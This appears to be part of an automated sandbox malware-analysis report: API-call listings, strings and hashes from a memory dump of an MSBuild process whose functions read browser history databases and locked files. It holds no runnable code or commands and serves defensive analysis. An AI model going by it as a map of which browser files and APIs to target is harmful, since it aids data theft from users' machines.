                                                                                                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2911713577-0
                                                                                                                                                                                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                                                    • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                    • API String ID: 2705122986-2036018995
                                                                                                                                                                                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                    • API String ID: 3354267031-2114579845
                                                                                                                                                                                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                                                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@DeleteObject
                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                    • API String ID: 1103273653-628097481
                                                                                                                                                                                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$memcmp
                                                                                                                                                                                    • String ID: $$8
                                                                                                                                                                                    • API String ID: 2808797137-435121686
                                                                                                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1979745280-0
                                                                                                                                                                                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                                                                                                    • API String ID: 2641622041-467022611
                                                                                                                                                                                    • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 839530781-0
                                                                                                                                                                                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                    • String ID: *.*$index.dat
                                                                                                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                                                                                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1156039329-0
                                                                                                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1125800050-0
                                                                                                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandleSleep
                                                                                                                                                                                    • String ID: }A
                                                                                                                                                                                    • API String ID: 252777609-2138825249
                                                                                                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                    • free.MSVCRT ref: 00409A31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
